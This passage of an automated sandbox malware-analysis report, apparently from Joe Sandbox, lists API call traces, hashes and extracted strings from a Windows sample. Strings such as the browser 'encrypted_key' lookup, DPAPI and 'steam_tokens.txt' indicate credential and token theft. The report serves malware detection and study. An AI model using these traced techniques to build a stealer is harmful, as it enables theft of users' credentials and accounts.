                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 29ca02a3ef89dafbb6da94f836a7cd55a6c0e1dd98f39151e9f8964b03b7dae2
                          • Instruction ID: 4b7edc143b50e959f17f963ee9a79b513a4d302aba8545cd14d630f98cde962a
                          • Opcode Fuzzy Hash: 29ca02a3ef89dafbb6da94f836a7cd55a6c0e1dd98f39151e9f8964b03b7dae2
                          • Instruction Fuzzy Hash: 7501B17560031DABD710CBA09C59EFB7BBCEB49711F104058FE85E7281EA75590787A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F289C
                            • Part of subcall function 007F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2925
                            • Part of subcall function 007F2910: RtlAllocateHeap.NTDLL(00000000), ref: 007F292C
                            • Part of subcall function 007F2910: RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007F28A9), ref: 007F294B
                            • Part of subcall function 007F2910: RegQueryValueExA.ADVAPI32(007F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007F2965
                            • Part of subcall function 007F2910: RegCloseKey.ADVAPI32(007F28A9), ref: 007F296F
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007E9500), ref: 007F28D1
                          • RegQueryValueExA.ADVAPI32(007E9500,0125E1F0,00000000,00000000,00000000,000000FF), ref: 007F28EC
                          • RegCloseKey.ADVAPI32(007E9500), ref: 007F28F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 5c4f0d7546a157b080d06f1e8011be960a7c317a0d50f4bd2681c307c8f303fc
                          • Instruction ID: 61902d5fd13abf217dc02ee8fda0dafb95a48352e64a244df4815d2404361dd8
                          • Opcode Fuzzy Hash: 5c4f0d7546a157b080d06f1e8011be960a7c317a0d50f4bd2681c307c8f303fc
                          • Instruction Fuzzy Hash: 6E018B71A0020DABEB10DBE4AC49EBB777DEB44311F004158FE48D6292EA7899478BA0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 007D723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 007D7279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D7280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007D72C3
                          • HeapFree.KERNEL32(00000000), ref: 007D72CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 007D7329
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 596ccacbea22fdc49128e00582ee76d60df4a7dd4e20746fa7dd77ce1564174d
                          • Instruction ID: 77434e852108ba250efd69ec7a76a237ee10f35e05d047100909ae9e5902209c
                          • Opcode Fuzzy Hash: 596ccacbea22fdc49128e00582ee76d60df4a7dd4e20746fa7dd77ce1564174d
                          • Instruction Fuzzy Hash: 5B417B717046469BDB24CFA9DC84BAAB3F8FB88305F14456AEC49CB300E639E901DB50
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007D9CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007D9CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007D9D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: c64ad769274d264d3cae3ff7bcccdcf593a6ffe92edb50f7c73835811a9ac4b9
                          • Instruction ID: c0b872ee39daaffbc594feed096681894ba6ae1fc6c7ef8e47d81769f525fd6d
                          • Opcode Fuzzy Hash: c64ad769274d264d3cae3ff7bcccdcf593a6ffe92edb50f7c73835811a9ac4b9
                          • Instruction Fuzzy Hash: 2741D271A102199BDB21EFB4DC496EEB7B5EF94304F048466EE15A7353EA38ED02C790
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EEA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEA53
                          • lstrcat.KERNEL32(?,00000000), ref: 007EEA61
                          • lstrcat.KERNEL32(?,00801794), ref: 007EEA7A
                          • lstrcat.KERNEL32(?,012591D8), ref: 007EEA8D
                          • lstrcat.KERNEL32(?,00801794), ref: 007EEA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 5c27300cc0c6f778a2b7ae5545e621b8daa09457cf5e8c843705c56984f4afa3
                          • Instruction ID: 0c16ffae1a975c62e506dba41ccf63f9ffb9b667ab6eb62fc77f565d0ab137cb
                          • Opcode Fuzzy Hash: 5c27300cc0c6f778a2b7ae5545e621b8daa09457cf5e8c843705c56984f4afa3
                          • Instruction Fuzzy Hash: 5741947191011CEBCB55EFA4DC45BEE7378FF98300F004469BA16A7342DE789E468B54
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EECDF
                          • lstrlen.KERNEL32(00000000), ref: 007EECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EED1D
                          • lstrlen.KERNEL32(00000000), ref: 007EED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 007EED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 38acbf46d428bbcfa69814ddc117658846b8de3a7cea92d735c2dc3c0667939e
                          • Instruction ID: 48d346cacbb2c4555fd392d6ca135c0e38db9920af6dec772084d37000f9a99e
                          • Opcode Fuzzy Hash: 38acbf46d428bbcfa69814ddc117658846b8de3a7cea92d735c2dc3c0667939e
                          • Instruction Fuzzy Hash: D8315E71A111599BC722FB79EC4EA6E77B8EF94300F04A521B846EB313DA2CDC078791
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,007D140E), ref: 007D9A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,007D140E), ref: 007D9AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,007D140E), ref: 007D9AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,007D140E,00000000,?,?,?,007D140E), ref: 007D9AE0
                          • LocalFree.KERNEL32(?,?,?,?,007D140E), ref: 007D9B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,007D140E), ref: 007D9B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 393e6c8bbebaf98feb6dc71ce2cb424cadfebdd74bdc97bf86074b2c2a7e558e
                          • Instruction ID: 2e3f4d0a6ff49269ec8c77483c805acd8ee7a47ee294e1e4e0537cbf831251c2
                          • Opcode Fuzzy Hash: 393e6c8bbebaf98feb6dc71ce2cb424cadfebdd74bdc97bf86074b2c2a7e558e
                          • Instruction Fuzzy Hash: BD1121B1600219AFE710DFA9DC89EAB777CEB45740F10425AFA15A6280EB749D42CB64
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5B14
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 007F5B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 007F5B89
                          • memmove.MSVCRT(00000000,?,?), ref: 007F5B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: dbd647d051032a507927a948723650940860052e099edee08da62ea2aeae1991
                          • Instruction ID: 3310620b6f3c47110e3cbff861ca3073fd763d80f9fc05ab05330c63b376ef74
                          • Opcode Fuzzy Hash: dbd647d051032a507927a948723650940860052e099edee08da62ea2aeae1991
                          • Instruction Fuzzy Hash: 3C4161B1B005199FCF08DF6CC995A7EBBB5EB89310F158229EA19E7344E634DD00CB90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D58
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1D5
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: f6b63f7ffda7448aad7334d79456439d9d9f6a8e80dfc40868a4d7a5a9370050
                          • Instruction ID: 166c8373626c8cb8bc161aa787fb064c3531947c3651ef4d83a7ecc75a8ad321
                          • Opcode Fuzzy Hash: f6b63f7ffda7448aad7334d79456439d9d9f6a8e80dfc40868a4d7a5a9370050
                          • Instruction Fuzzy Hash: 3421E6313052449BD728DE6DDC80A3AB7E5FF99720B204A6EE556CB381E775DC00C3A1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F33EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F33F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 007F3411
                          • wsprintfA.USER32 ref: 007F3437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 38efe877d75a47e1e7ec4a9beb877874dff9bed875ad7fa878ff513b711d2e83
                          • Instruction ID: 323634dc629c28ec5368057ebb3c3ac03af1bbf79c3d4df3e69118084ce6b68f
                          • Opcode Fuzzy Hash: 38efe877d75a47e1e7ec4a9beb877874dff9bed875ad7fa878ff513b711d2e83
                          • Instruction Fuzzy Hash: BE01B5B1A0461CABDB04DF98DC49B7FB7B8FB44710F004229FA06E7780D778990186A5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0125DBD0,00000000,00020119,?), ref: 007ED7F5
                          • RegQueryValueExA.ADVAPI32(?,0125E310,00000000,00000000,00000000,000000FF), ref: 007ED819
                          • RegCloseKey.ADVAPI32(?), ref: 007ED823
                          • lstrcat.KERNEL32(?,00000000), ref: 007ED848
                          • lstrcat.KERNEL32(?,0125E3D0), ref: 007ED85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 96b80f64f79ac94746372950143be12ac48f96970f2633e7f6becd39e5c868f7
                          • Instruction ID: 8435b8662a466404d829b64cc59f4650bba593b15f5b47c531b61e1c8ae23f35
                          • Opcode Fuzzy Hash: 96b80f64f79ac94746372950143be12ac48f96970f2633e7f6becd39e5c868f7
